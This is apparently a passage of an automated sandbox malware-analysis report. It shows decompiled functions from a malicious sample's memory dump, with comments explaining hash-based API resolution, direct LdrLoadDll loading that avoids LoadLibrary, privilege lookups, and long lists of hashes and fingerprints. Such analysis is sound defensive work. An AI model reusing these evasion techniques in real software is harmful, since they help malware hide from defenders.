                                         				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                         				// _a8 is passed straight through as the handle to close.
                                         				_t8 = NtClose(_a8); // executed
                                         				return _t8;
                                         			}





                                         Instruction offsets: 0x00419e93, 0x00419e96, 0x00419e9f, 0x00419ea7, 0x00419eb5, 0x00419eb9

                                        APIs
                                        • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                        • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                        • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: ee1d9edb4050d36e20a9ddf1e2d255aee3b50d2944b3b22590908bb615257ff3
                                        • Instruction ID: b3a9b438f7dbe0df1384a919cb0ccde4bba7b8bc97f15b004e69351ecdfafb71
                                        • Opcode Fuzzy Hash: ee1d9edb4050d36e20a9ddf1e2d255aee3b50d2944b3b22590908bb615257ff3
                                        • Instruction Fuzzy Hash: 3090026660100502D30171594404B17004AD7D0381F91C07AA1014595ECA6589A2F171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 0c99141745652553aa51b08220c986f6897abc2f2b77fac56bf89bcc028d94ad
                                        • Instruction ID: afbfe705632cae855b2ea283b7bc0c2fd14c96fbf443b17c116f3b3c9c9d602e
                                        • Opcode Fuzzy Hash: 0c99141745652553aa51b08220c986f6897abc2f2b77fac56bf89bcc028d94ad
                                        • Instruction Fuzzy Hash: 5C90027620100413D31161594504B070049D7D0381F91C47AA0414598D96968962F161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 906f1dc8a02c969c718e57537c274765b05d688af90033f028aad0f24da478ce
                                        • Instruction ID: 1ce1f23cb07642be14869ba03b5f69c5312b908433247d2debaad6d05b56eff8
                                        • Opcode Fuzzy Hash: 906f1dc8a02c969c718e57537c274765b05d688af90033f028aad0f24da478ce
                                        • Instruction Fuzzy Hash: AD900266242041525745B1594404A074046E7E0381791C07AA1404990C85669866E661
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 42a0a86c9a1838fb64bff13cbba6be4ce324401a5181746bdff4b1983b37dc66
                                        • Instruction ID: 3c16a724926a03016c38c9ea789bde994e583aff62f0da8d073761539a8a81bd
                                        • Opcode Fuzzy Hash: 42a0a86c9a1838fb64bff13cbba6be4ce324401a5181746bdff4b1983b37dc66
                                        • Instruction Fuzzy Hash: B79002A634100442D30061594414F070045D7E1341F51C07DE1054594D8659CC62B166
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 829b3fdb0f74b0e878361555b284b87c20216c4b482878407f7cfcc944353c41
                                        • Instruction ID: dcc9867185f830ec76a10b5ebf7af5a85c167381506aeaad011e1d19fee43b36
                                        • Opcode Fuzzy Hash: 829b3fdb0f74b0e878361555b284b87c20216c4b482878407f7cfcc944353c41
                                        • Instruction Fuzzy Hash: B09002B620100402D34071594404B470045D7D0341F51C079A5054594E86998DE5B6A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 152b2993153229f9fe2e74a533d577a8ca467798207856d5885e159f5b9edd9b
                                        • Instruction ID: 0e4906780e64fca21e890a00484851c4d1d488e90805896463a5eb187a99f029
                                        • Opcode Fuzzy Hash: 152b2993153229f9fe2e74a533d577a8ca467798207856d5885e159f5b9edd9b
                                        • Instruction Fuzzy Hash: 6590026660100042434071698844E074045FBE1351751C179A0988590D85998875A6A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 829adb1dcb85c3d5c5a3ea752516ebb7ca26451dc611a44d6da359d985d88c59
                                        • Instruction ID: 01714dbbc970b4de85c11121f10467464e358f2486616c7fbcaeb4c619fb15b4
                                        • Opcode Fuzzy Hash: 829adb1dcb85c3d5c5a3ea752516ebb7ca26451dc611a44d6da359d985d88c59
                                        • Instruction Fuzzy Hash: 2390027620140402D30061594814B0B0045D7D0342F51C079A1154595D86658861B5B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: a8c5416b055ef68a37f9d62f60bdd7659d0113c6cbeaa2bd99a8b8be799b7ba6
                                        • Instruction ID: 7f6fd0c9ac98c599cb0147779c06938f0a0b809183f0ff6eca6e7a79ff67e11c
                                        • Opcode Fuzzy Hash: a8c5416b055ef68a37f9d62f60bdd7659d0113c6cbeaa2bd99a8b8be799b7ba6
                                        • Instruction Fuzzy Hash: 6490026621180042D30065694C14F070045D7D0343F51C17DA0144594CC9558871A561
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 099ca5208d5596d7a796bb40c0c12d1bbf50bbc634466d4d19e13e9278162471
                                        • Instruction ID: 820ba26fcda885b21b30f9248597b6f13e2815c741c95877b504e3c92286ad95
                                        • Opcode Fuzzy Hash: 099ca5208d5596d7a796bb40c0c12d1bbf50bbc634466d4d19e13e9278162471
                                        • Instruction Fuzzy Hash: 749002A620200003430571594414B17404AD7E0341B51C079E10045D0DC56588A1B165
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 948db111c30cc1e206415e8e0d64205323e33d2cd8ad6a1311bc17d8585a89df
                                        • Instruction ID: 98ac6fa92f6ad7b2da1003648a83820b0d719899efc07a10961cbf3b3c724ef4
                                        • Opcode Fuzzy Hash: 948db111c30cc1e206415e8e0d64205323e33d2cd8ad6a1311bc17d8585a89df
                                        • Instruction Fuzzy Hash: 3C90026A211000030305A5590704A070086D7D5391351C079F1005590CD6618871A161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 22bf2699ff1417e02c9b955cd84fdf405dc3bc9a96252dfb4a05a587b25d8a46
                                        • Instruction ID: ef3f1d21338aae1d0a101c2286d0c20732ce2425e0930c46edd68b7c14ac3775
                                        • Opcode Fuzzy Hash: 22bf2699ff1417e02c9b955cd84fdf405dc3bc9a96252dfb4a05a587b25d8a46
                                        • Instruction Fuzzy Hash: FF90027620108802D31061598404B4B0045D7D0341F55C479A4414698D86D588A1B161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: bd4e91a4b9847d5a0978da04bcb948c49ee2972cdd7ef5752c06c1446990a5dc
                                        • Instruction ID: 325ee70470f4df6fd41f4c485a4bc285edc6479432de1a9358f39abf841e8828
                                        • Opcode Fuzzy Hash: bd4e91a4b9847d5a0978da04bcb948c49ee2972cdd7ef5752c06c1446990a5dc
                                        • Instruction Fuzzy Hash: 1890027620100802D38071594404B4B0045D7D1341F91C07DA0015694DCA558A69B7E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 7082c8045f9bea87da28bcdbe98670f19b29784f4704124378a33273b9893a02
                                        • Instruction ID: 82f65bcc8152117e1afa4bad3c2e2826e821ab89e2ee0e9e12710210c716768e
                                        • Opcode Fuzzy Hash: 7082c8045f9bea87da28bcdbe98670f19b29784f4704124378a33273b9893a02
                                        • Instruction Fuzzy Hash: 4E90026630100003D34071595418B074045E7E1341F51D079E0404594CD9558866A262
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: bee7edcfdb24307536adb992d2b0051dc6875d9236aaf3d8ed31bdac61e41337
                                        • Instruction ID: be30c140c696cdd7e7ea431e17e49f4edc2de0adfba1fe8339a275f66706a895
                                        • Opcode Fuzzy Hash: bee7edcfdb24307536adb992d2b0051dc6875d9236aaf3d8ed31bdac61e41337
                                        • Instruction Fuzzy Hash: 2090026E21300002D38071595408B0B0045D7D1342F91D47DA0005598CC9558879A361
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 621ccd90a5ab7a2be581587d5b741a6cae5dd9bef7a1c874408dfe16d77b8a1a
                                        • Instruction ID: d89720763f8755e7e2197540fca22f5a2338286f5f132800046c9f4e74f0f745
                                        • Opcode Fuzzy Hash: 621ccd90a5ab7a2be581587d5b741a6cae5dd9bef7a1c874408dfe16d77b8a1a
                                        • Instruction Fuzzy Hash: B290027620100402D30065995408B470045D7E0341F51D079A5014595EC6A588A1B171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                        • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                        • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                        • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 82%
                                         			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
                                         				char _v67;
                                         				char _v68;
                                         				void* _t12;
                                         				intOrPtr* _t13;
                                         				int _t14;
                                         				long _t21;
                                         				intOrPtr* _t25;
                                         				void* _t26;
                                         				void* _t30;
                                         				void* _t32;
                                         
                                         				_t30 = __eflags;
                                         				// Zero a 64-byte stack buffer (_v68 plus 0x3f bytes) and pass it to
                                         				// E0041C400 with the constant 3; the filled buffer then goes to the loader.
                                         				_v68 = 0;
                                         				E0041B860( &_v67, 0, 0x3f);
                                         				E0041C400( &_v68, 3);
                                         				// E0040ACD0 is the LdrLoadDll wrapper listed further down (its listing
                                         				// starts 13 bytes early, at E0040ACC3); it yields the module handle.
                                         				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
                                         				// Resolve an export of that module by the hash 0xc4e7b6d6 rather than by
                                         				// name (the "dynamically determine API calls" behaviour in the overview).
                                         				_t13 = L00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                         				_t25 = _t13;
                                         				if(_t25 != 0) {
                                         					// Post WM_COMMAND (0x111) to the thread id in _a8; if that fails, call
                                         					// the hash-resolved function with the same thread id and 0x8003.
                                         					_t21 = _a8;
                                         					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                         					_t32 = _t14;
                                         					if(_t14 == 0) {
                                         						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                         					}
                                         					return _t14;
                                         				}
                                         				return _t13;
                                         			}












                                         Instruction offsets: 0x004082f0, 0x004082ff, 0x00408303, 0x0040830e, 0x0040831e, 0x0040832e, 0x00408333, 0x0040833a, 0x0040833d, 0x0040834a, 0x0040834c, 0x0040834e, 0x0040836b, 0x0040836b, 0x00000000, 0x0040836d, 0x00408372

                                        APIs
                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                        Memory Dump Source
                                        • Source File: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                        • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                        • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                        • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 80%
                                         			E0040ACC3(void* __eax, void* __ebx, void* __ecx, signed int __edi, intOrPtr _a4, void* _a8) {
                                         				intOrPtr _v4;
                                         				struct _EXCEPTION_RECORD _v8;
                                         				struct _OBJDIR_INFORMATION _v12;
                                         				char _v16;
                                         				char _v540;
                                         				struct _OBJDIR_INFORMATION _t20;
                                         				void* _t25;
                                         				struct _OBJDIR_INFORMATION _t27;
                                         				void* _t38;
                                         				void* _t41;
                                         
                                         				// The decompiler began this listing 13 bytes before the real entry
                                         				// (E004082F0 calls E0040ACD0, not E0040ACC3), so the next four statements
                                         				// are a misaligned decode of the bytes in front of the function, not
                                         				// logic the implant executes. The struct types above are decompiler guesses.
                                         				asm("pushfd");
                                         				asm("stc");
                                         				asm("insd");
                                         				if((__edi ^  *(__edi - 0xc)) != 0) {
                                         					L5:
                                         					E0041CCF0( &_v8, 0);
                                         					goto L6;
                                         				} else {
                                         					// Real prologue. _v540 is a MAX_PATH-sized (0x104) buffer; E0041C650
                                         					// is given that length and the caller's _a4, and _v8/_v12 serve as the
                                         					// string descriptor and the returned module handle.
                                         					_push(_t38);
                                         					_t38 = _t41;
                                         					_v12 =  &_v540;
                                         					_t25 = E0041C650( &_v16, 0x104, _a4);
                                         					if(_t25 != 0) {
                                         						_t27 = E0041CA70(__eflags, _v8);
                                         						__eflags = _t27;
                                         						if(_t27 != 0) {
                                         							goto L5;
                                         						}
                                         						L6:
                                         						// Look the module up first; only when it is not already present is
                                         						// it loaded through LdrLoadDll directly, bypassing LoadLibrary.
                                         						_t20 = E0041AEA0(_v4);
                                         						_v12 = _t20;
                                         						__eflags = _t20;
                                         						if(_t20 == 0) {
                                         							LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
                                         							_t20 = _v12;
                                         						}
                                         						return _t20;
                                         					} else {
                                         						return _t25;
                                         					}
                                         				}
                                         			}













                                         Instruction offsets: 0x0040acc3, 0x0040acc8, 0x0040acc9, 0x0040acca, 0x0040ad0f, 0x0040ad15, 0x00000000, 0x0040accc, 0x0040acd0, 0x0040acd1, 0x0040acec, 0x0040acef, 0x0040acf9, 0x0040ad03, 0x0040ad0b, 0x0040ad0d, 0x00000000, 0x00000000, 0x0040ad1d, 0x0040ad21, 0x0040ad29, 0x0040ad2c, 0x0040ad2e, 0x0040ad42, 0x0040ad44, 0x0040ad44, 0x0040ad4a, 0x0040acfb, 0x0040acfe, 0x0040acfe, 0x0040acf9

                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: 491d57289d6b76dbf47689211f22874d938db2dca6aec03b9b621a641ab3e1be
                                        • Instruction ID: 13bc7a4777827c273102ec3a69b4fa8c462a7b114b9ed6a62398f931e286b2be
                                        • Opcode Fuzzy Hash: 491d57289d6b76dbf47689211f22874d938db2dca6aec03b9b621a641ab3e1be
                                        • Instruction Fuzzy Hash: 720171B5D4020DABDF10DFA4DC81FDDBB75AF54308F1082AAE908A7281F634AB54CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                        Memory Dump Source
                                        • Source File: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: b152db1fdee560bd763f6c2686c6aa9dfbe3230d69f135045f1da479af764b67
                                        • Instruction ID: 8f77f80b7463f2c8332381f0b5549404b1d42c3e6c11cc9d556c9b2ab4a61cc8
                                        • Instruction Fuzzy Hash: E7F055362102006BC710EBA8CC46CEBB7A9EFC8330B04C48AF95C87302C232EA5487D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 44%
                                        			E0041A1C1(void* __eax, void* __ecx, signed int __edx, void* __edi, intOrPtr _a4, WCHAR* _a8, signed char _a12, void* _a16) {
                                        				signed char _t13;
                                        				int _t15;
                                        				WCHAR* _t20;
                                        
                                        				asm("adc esp, esp");
                                        				asm("arpl [edx-0x35], bx");
                                        				 *(__edi - 0x74aafe3c) =  *(__edi - 0x74aafe3c) & __edx;
                                        				E0041A960(__edi, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                        				_t13 = _a12;
                                        				_t20 = _a8;
                                        				asm("les edx, [edx+edx*2]");
                                        				_t15 = LookupPrivilegeValueW(_t20, _t13 | 0x00000083, ??); // executed
                                        				return _t15;
                                        			}

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                        Memory Dump Source
                                        • Source File: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: 260bc2e0297b61e89c3a52a7c47816c15a31ca062ff18f00a7caadebd9b9b745
                                        • Instruction ID: 217b86f539735e6d28fb20e59dba06c1d376326510f74e0bbb85afc5f7da938c
                                        • Instruction Fuzzy Hash: 87F0A0B16102046FDB10DF64CC89EE77BA8EF45320F00856AF98897201D630A411CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 79%
                                        			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                        				char _t10;
                                        				void* _t15;
                                        
                                        				asm("in al, dx");
                                        				_t7 = _a4;
                                        				_t3 = _t7 + 0xc74; // 0xc74
                                        				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                        				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                        				return _t10;
                                        			}

                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                        Memory Dump Source
                                        • Source File: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID:
                                        • API String ID: 3298025750-0
                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                        • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                        • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                        				void* _t10;
                                        				void* _t15;
                                        
                                        				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                        				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                        				return _t10;
                                        			}

                                        APIs
                                        • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                        Memory Dump Source
                                        • Source File: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                        • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                        • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 65%
                                        			E0041A1D0(intOrPtr _a4, WCHAR* _a8, signed char _a12, void* _a16) {
                                        				signed char _t9;
                                        				int _t11;
                                        				WCHAR* _t13;
                                        				void* _t16;
                                        
                                        				E0041A960(_t16, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                        				_t9 = _a12;
                                        				_t13 = _a8;
                                        				asm("les edx, [edx+edx*2]");
                                        				_t11 = LookupPrivilegeValueW(_t13, _t9 | 0x00000083, ??); // executed
                                        				return _t11;
                                        			}

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                        Memory Dump Source
                                        • Source File: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                        • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                        • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 79%
                                        			E0041A072() {
                                        				char _t10;
                                        				void* _t15;
                                        				void* _t19;
                                        
                                        				asm("in al, dx");
                                        				_t7 =  *((intOrPtr*)(_t19 + 8));
                                        				_t3 = _t7 + 0xc74; // 0xc74
                                        				E0041A960(_t15,  *((intOrPtr*)(_t19 + 8)), _t3,  *((intOrPtr*)( *((intOrPtr*)(_t19 + 8)) + 0x10)), 0, 0x35);
                                        				_t10 = RtlFreeHeap( *(_t19 + 0xc),  *(_t19 + 0x10),  *(_t19 + 0x14)); // executed
                                        				return _t10;
                                        			}

                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                        Memory Dump Source
                                        • Source File: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID:
                                        • API String ID: 3298025750-0
                                        • Opcode ID: 1003f38348de91aff8aad5e4e63cc2b9c0e10c34f63be8fed3bedb6f3b3b3e34
                                        • Instruction ID: ddaf06fc0fbaf1b3adebf30d23e32afc4f43d02d9fcb1c6cda465e482f3eb4e3
                                        • Instruction Fuzzy Hash: BAE046B1200204AFDB18DF69CC88EE73768EF88360F018659F90CAB241C631E910CAB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0041A0B0(intOrPtr _a4, int _a8) {
                                        				void* _t10;
                                        
                                        				_t5 = _a4;
                                        				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                        				ExitProcess(_a8);
                                        			}

                                        APIs
                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                        Memory Dump Source
                                        • Source File: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                        • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                        • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: dcb8c95a3bf550d7884b7b70285db2f2367bc0f7efec8ca683e06c0a5bd79b15
                                        • Instruction ID: 479fa97fa1cf95204149968eb9de2ab3c64e97871f4b5f6b3dd88b3fb72dfd3f
                                        • Instruction Fuzzy Hash: 0CB09B729014C5C6D711D7604608B277A40F7D0741F26C0B6D2030681A4778C491F5B5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: C$a$b$d$i
                                        • API String ID: 0-2334916691
                                        • Opcode ID: 7f910b7fd01d7d6b692b995daa2468f68b2049c7b0b6c094c4e888967b75a541
                                        • Instruction ID: dbc153a3c366992ac256709e05060a69be941f6317d89646d5f8f34cd47f59e6
                                        • Instruction Fuzzy Hash: C231A371A05308ABD714DFA1DC41BEFB778EF49304F00451EF519A7241DB7969418BE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
